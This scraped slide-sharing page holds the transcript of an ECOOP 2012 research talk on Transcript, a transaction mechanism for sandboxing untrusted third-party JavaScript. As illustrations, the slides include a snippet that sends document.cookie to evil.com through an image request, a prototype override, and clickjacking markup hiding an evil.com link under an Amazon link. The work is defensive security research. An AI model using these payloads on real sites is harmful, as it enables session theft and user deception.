1 / 24

Enhancing JavaScript with Transactions

Mohan Dhawan † , Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡ School of Informatics and Computing, Indiana University. Enhancing JavaScript with Transactions. Problem. Web applications include third party content

annice
Download Presentation

Enhancing JavaScript with Transactions

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy† †Department of Computer Science, Rutgers University ‡School of Informatics and Computing, Indiana University ECOOP 2012 Enhancing JavaScriptwith Transactions

  2. Problem Web applications include third party content Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript ECOOP 2012

  3. Example from nytimes.com Rogue third party advertisement Displayed image of fake virus scan Client security and privacy at risk ECOOP 2012

  4. Solution: Transcript Extend JavaScript to support Transactions Execute untrusted content speculatively Commit changes after policy enforcement ECOOP 2012 Web Application Transaction

  5. Goal Protect the Web application from security violating actions of untrusted JavaScript Must handle arbitrary third party code written in JavaScript Including constructs such as eval, this, with. Must enforce powerful security policies Allow pop-ups from white-listed websites only. Dis-allow innerHTML in the context of host Web application. ECOOP 2012

  6. Contributions JavaScript transactions Speculative execution of unmodified third party JavaScript code Transaction suspend/resume Allow host Web application to mediate external actions like DOM and AJAX operations Speculative DOM updates ECOOP 2012

  7. Schematic use of Transcript // Web application code var tx = transaction{ ... // unmodified 3rd party code ... }; // Introspection block goes below /* policy enforcement code */ // validate actions of the transaction tx.commit(); //Rest of the Web application code ECOOP 2012 Transaction Web Application

  8. Example: Untrusted code // Web application code var tx = transaction{ var image = document.createElement("img"); var url = "http://evil.com/grabcookie.php"; var params = document.cookie; image.src = url + "?cookie=" + params; document.body.appendChild(image); ... Array.prototype.join = function() { return "evilString"; }; }; ECOOP 2012 Web Application Transaction

  9. DOMTX ECOOP 2012 Transcript Runtime 4 appendChild tx’s write set + Heaporig DOM’TX Heapnew + Transaction object tx Transaction object tx resume image web app* 3rd party 3rd party DOMTX R/W sets DOMTX R/W sets DOM’TX DOMnew … call stack call stack 1 2 3 Transcript clones the host’s DOM when the transaction starts. 1 DOMorig DOMTX 4 Clone 5 1 2 3 1 3rd-party 5 6 call stack 3rd party web app web app web app web app … … call stack … … web app* … Web application code … tx = transaction { ... body.appendChild(image); ... }; do { ... tx = tx.resume(); ... } while(tx.isSuspended()); tx.commit(); Transcript runtime system Introspection block On a transaction suspend, the Transcript runtime saves all the i) read write sets , ii) speculative DOM , and iii) stack frames till the nearest transaction delimiter to create a Transaction object Transcript runtime loads the saved read write sets and stack frames when the transaction resumes. In the introspection block, the host performs the action (appendChild) on behalf of the guest. … Rest of the Web application September 19, 2014 9

  10. Transaction suspend and resume var tx = transaction{ ... document.body.appendChild(image); }; do{ var rs = tx.getReadSet(), arg = tx.getArgs(); switch(tx.getCause()) { case "appendChild": if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); break; }; /* end switch */ tx = tx.resume(); }while(tx.isSuspended()); ECOOP 2012 Transaction Web Application Policy if (!(arg[0].nodeName.match("IMG") && rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]);

  11. Read and Write Sets var tx = transaction{ ... Array.prototype.join = function() { return "evilString"; }; }; /* Introspection Code */ var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, "*") { to_commit = false; } // Rest of the web application code ECOOP 2012 Transaction Web Application Policy var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, "*")){ to_commit = false; }

  12. Gluing var tx = transaction{ ... document.write(‘<script src= “newcode.js”></s’ + ‘cript>’); }; // Introspection block // Rest of the web application code ECOOP 2012 Transaction Web Application

  13. Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features transaction keyword and Transaction object Modified SpiderMonkey op-codes to Log all object accesses Suspend on DOM / AJAX calls Added speculative execution support for DOM operations Re-direct all node accesses to the cloned copy ECOOP 2012

  14. ECOOP 2012 Evaluation • Goals • Study applicability of Transcript in isolating real guest code • Measure performance impact on guest code and micro-benchmarks • Demonstrate graceful recovery in presence of malicious and buggy guests • Methodology • Isolated the guest code in a Web application using transactions • Introspection block for each transaction enforced a number of general and domain specific policies September 19, 2014 14

  15. ECOOP 2012 Applicability of Transcript • Applied Transcript on five JavaScript widgets and applications • Stand-alone and library based • No difference in behavior and functionality September 19, 2014 15

  16. ECOOP 2012 Performance - Application benchmarks Overhead = 0.16s September 19, 2014 16

  17. ECOOP 2012 Performance – Microbenchmarks (Function calls) September 19, 2014 17

  18. ECOOP 2012 Performance – Microbenchmarks (JavaScript Events) Average overhead of just 94μs per event. September 19, 2014 18

  19. ECOOP 2012 Recovery • Clickjacking document.write(`<divstyle="z-index:-1;...other size/loc params"> <a href="http://www.amazon.com"> Goto Amazon </a> </div>'); ... document.write(`<divstyle="opacity: 0.0; z-index:0;...same size/loc params"> <a href="http://evil.com"> Goto Amazon </a> </div>'); September 19, 2014 19

  20. Related Work Staged information flow in JavaScript: PLDI'09 hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code Conscript: S&P'10 aspect-oriented framework to specify and enforce fine-grained security policies for Web applications AdJail: Security'10 isolation mechanism to protect Web application content from malicious advertisements Caja, FBJS, AdSafe, etc. ECOOP 2012

  21. Conclusion Transcript implements JavaScript transactions to provide isolation and recovery Suspend operations that break isolation Resume operation if web application allows Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit No restriction or changes to third party code ECOOP 2012

  22. Questions ? ECOOP 2012

  23. Event handler wrapper generation ECOOP 2012 var tx = transaction{ ... node.addEventListener(“click”, handler, false); }; // Introspection block var tx = transaction{ ... node.addEventListener(“click”, tx_handler, false); }; // Introspection block tx_handler = function(evt) { evt_tx = transaction { handler(evt); } iblock_func(evt_tx); } evt_tx = transaction { handler(evt); }

  24. ECOOP 2012 A complete example <script src="jsMenu.js" func="menu"></script> <script> (function () { var to_commit = true, e = eval; // indirect eval var tx = transaction{ e(getFunctionBody(menu)); }; do { ... <application-specific-policies> ... tx = tx.resume(); } while(tx.isSuspended()); if(to_commit) tx.commit(); )(); </script> September 19, 2014 24

More Related